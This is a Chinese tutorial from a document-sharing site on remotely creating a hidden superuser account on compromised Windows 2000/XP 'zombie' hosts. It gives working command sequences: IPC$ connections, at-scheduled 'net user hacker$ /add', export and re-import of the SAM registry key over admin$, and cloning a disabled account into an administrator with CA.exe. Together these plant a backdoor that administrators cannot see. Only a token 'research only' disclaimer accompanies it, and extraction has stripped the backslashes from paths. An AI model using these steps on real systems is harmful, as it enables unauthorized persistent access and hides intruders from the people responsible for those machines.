在命令行下远程建立隐藏的超级用户

上传人:kms****20 文档编号:41018684 上传时间:2018-05-28 格式:DOC 页数:15 大小:43KB
返回 下载 相关 举报
在命令行下远程建立隐藏的超级用户_第1页
第1页 / 共15页
在命令行下远程建立隐藏的超级用户_第2页
第2页 / 共15页
在命令行下远程建立隐藏的超级用户_第3页
第3页 / 共15页
在命令行下远程建立隐藏的超级用户_第4页
第4页 / 共15页
在命令行下远程建立隐藏的超级用户_第5页
第5页 / 共15页
点击查看更多>>
资源描述

《在命令行下远程建立隐藏的超级用户》由会员分享,可在线阅读,更多相关《在命令行下远程建立隐藏的超级用户(15页珍藏版)》请在金锄头文库上搜索。

1、在命令行下远程建立隐藏的超级用户在命令行下远程建立隐藏的超级用户如何在命令行下远程建立隐藏的超级用户在这里将用 at 的命令,因为用 at 产生的计划任务是以系统身份运行的,所以也用不到 psu.exe 程序。为了能够使用 at 命令,肉鸡必须开有 schedule 的服务,如果没有开启,可用流光里带的工具netsvc.exe 或 sc.exe 来远程启动,当然其方法也可以,只要能启动 schedule 服务就行。对于命令行方式,你可以采用各种连接方式,如用 SQLexec 连接MSSQL 的 1433 端口,也可以用 telnet 服务,只要以你能得到一个cmdshell,并且有运行 at

2、命令的权限就可以。1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为 administrator,密码为 12345678 的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。 (例子中的主机是我的局域网内的一台主机,我将它的 ip 地址改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的 ip 地址。)2、先与肉鸡建立连接,命令为: net use 13.50.97.238ipc$ “12345678“ /user:“administrator3、用 at 命令在肉鸡上建立一个用户(如果 at 服务没有启动,可用小榕的 netsvc

3、.exe 或 sc.exe 来远程启动):at 13.50.97.238 12:51c:winntsystem32net.exe user hacker$ 1234 /add建立这个加有$符的用户名,是因为加有$符后,命令行下用 net user 将不显示这个用户,但在帐户管理器却能看到这个用户。4、同样用 at 命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers 下键值:at 13.50.97.238 12:55c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccou

4、ntusers/e 是 regedit.exe 的参数,在HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将“c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers“引起来。5、将肉鸡上的 hacker.reg 下载到本机上用记事本打开进行编辑命令为:copy 13.50.97.238admin$system32hacker.regc:hacker.reg修改的方法图形界中已经介绍过了,这里就不作介绍了。6、再将编辑

5、好的 hacker.reg 拷回肉鸡上 copy c:hacker.reg 13.50.97.238admin$system32hacker1.reg7、查看肉鸡时间:net time 13.50.97.238 然后用 at 命令将用户 hacker$删除:at 13.50.97.238 13:40 net user hacker$ /del8、验证 hacker$是否删除:用net use 13.50.97.238 /del 断开与肉鸡的连接。net use 13.50.97.238ipc$ “1234“ /user:“hacker$“ 用帐户hacker$与肉鸡连接,不能连接说明已删除。9

6、、再与肉鸡建立连接:net use 13.50.97.238ipc$ “12345678“ /user:“administrator“再取得肉鸡时间,用 at 命令将拷回肉鸡的 hacker1.reg 导入肉鸡注册表:at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.regregedit.exe 的参数/s 是指安静模式。10、再验证 hacker$是否已建立,方法同上面验证 hacker$是否被删除一样。11、再验证用户 hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。12、通过 11 可以断定用户 hac

7、ker$具有超级用户权限,因为最初我用 at 命令建立它的时候是一个普通用户,而现在却具有远程读、写、删的权限。三、如果肉鸡没有开 3389 终端服务,而我又不想用命令行,怎么办?这种情况下,你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为 regedit.exe、regedt32.exe 都有连接网络注册表的功能,你可以用 regedt32.exe 来为远程主机的注册表项设置权限,用regedit.exe 来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。但是这里有

8、两个前提:1、先用 net use 肉鸡 ipipc$ “密码“ /user:“超级用户名“来与远程主机建立连接以后,才能用regedit.exeregedt32.exe 及帐户管理器与远程主机连接。2、远程主机必须开启远程注册表服务(没有开启的话,你也可以远程开启,因为你有超级用户的密码了) 。四、利用被禁用的帐户建立隐藏的超级用户:我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:1想办法查看有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将 guest 禁用,当然了会禁用其它用户。在图形界面下,非常容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红

9、叉;而在命令行下,我还没有想到好的办法,只能在命令行下用命令:“net user 用户名“一个一个来查看用户是否被禁用。2在这里,我们假设用户 hacker 被管理员禁用。首先,我先用小榕的超组用户克隆程序 CA.exe,将被禁用的用户 hacker 克隆成超级用户(克隆之后,被禁用的用户 hacker 就会自动被激活了): CA.EXE 肉鸡 ip administrator 超级用户密码 hacher hacher 密码。3如果你现在一个 cmdshell,如利用 telnet 服务或 SQLEXEC 连接肉鸡的 msSQL 的默认端口 1433 得到的 shell 都可以,这时你只要输入

10、命令:net user hacker /active:no 这样用户 hacker 就被禁用了(至少表面上是这样的) ,当然你也可以将用户 hacher 换成其它的被禁用的用户。4这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker 被禁用了,但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user 肉鸡 ipipc$ “hacker 密码“ /user:“hacker“ 连一连看看。我可以告诉大家,经过我多次试验,次次都能成功,而且还是超级用户权限。5如果没有 cmdshell 怎么办?你可以我上面介绍的 at 命令来禁用用户 hacker

11、;命令格式:at 肉鸡 ip 时间 net user hacker/active:no6原理:具体的高深的原理我也说不上来,我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会弹出一对话框,并禁止你继续禁用超级用户administrator,同样,因为在克隆时,hacker 在注册表的“F“键被超级用户administrator 在注册表的“F“键所替代,因而 hacker 就具有了超级用户的权限了,但是由于 hacker 在注册表内“C“健还是原来的“C“键,所以 hacker 还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用

12、户 hacker 还是可以连接肉鸡,而且还具有超级用户的权限。具体我也说不明白,大家权且这么理解吧。五、注意的几点事项:1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。3、如在本机上试验时,最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份,因为本人做试验时,曾出现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸好我有备份,呵呵。SAM 键是毕竟系统最敏感的部位。4、本方法在 2000/XP

13、上测试通过,未在 NT 上测试。本方法仅供研究,请勿将本方法用于破坏上,利用本方法造成严重后果者,由使用者负责,本人概不负责。笑云! 斑竹:青色山山 版号:135608 域名:http:/ 爱好软件交流的朋友,进来座座 笑云! 补充日期: 2003-02-20 12:43:48前几天在某个网站(记不清了,不好意思 _*)上看到了一篇介绍如何建立隐藏的超级用户的图文教程,给我了很大的启发,作者只说明了如何在本地图形界面下建立隐藏的超级用户,且作者说他无法在命令行下实现隐藏的超级用户的建立,于是我就开始自已摸索,刚开始时,我用 reg.exe(3.0 版)作为命令行下导出导入注册表文件的工具,但每

14、次导入以后,建立的隐藏的超级用户总不能用,后来打开注册表查看,发现这个隐藏的超级用户的默认数据类型并没有被导入注册表。由于这种数据类型是十六进制数表示的(如administrator 的默认数据类型为 000001F4,下面例子中的hacker$的数据类型是 00000409)而不是我们常说的字符串型、dword 型、二进制型等数据类型,reg.exe 不能识别,因而也就无法导入,而在图形界面下用注册表编辑器 regedit.exe 却能够将这种数据类型导入,后来一想 regedit.exe 是一个两栖程序,它既可以在 windows 界面下运行,也可以在 DOS 下运行,既然图形界面rege

15、dit.exe 能够导入这种数据类型,那么 DOS 下面的它也应该能够导入这种数据类型,后来经试验证明了我的想法。下面我把我实现这个隐藏的超级用户建立方法介绍如下:一、如何在图形界面建立隐藏的超级用户图形界面下适用本地或开 3389 终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到 psu.exe(让程序以系统用户身份运行的程序) ,如果在肉鸡上的话还要上传 psu.exe。我说的这个方法将不用到 psu.exe 这个程序。因为 windows2000 有两个注册表编辑器:regedit.exe 和 regedt32.exe。XP 中regedit.exe 和 reg

16、edt32.exe 实为一个程序,修改键值的权限时在右键中点“权限”来修改。对 regedit.exe 我想大家都很熟悉,但却不能对注册表的项键设置权限,而 regedt32.exe 最大的优点就是能够对注册表的项键设置权限。nt/2000/xp 的帐户信息都在注册表的 HKEY_LOCAL_MACHINESAMSAM 键下,但是除了系统用户 SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe 对 SAM 键为我设置为“完全控制”权限。这样就可以对 SAM 键内的信息进行读写了了。具体步聚如下:1、假设我们是以超级用户 administrator 登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户net user hacker$ 1234 /add2、在开始/运行中输入:regedt3

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 生活休闲 > 科普知识

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号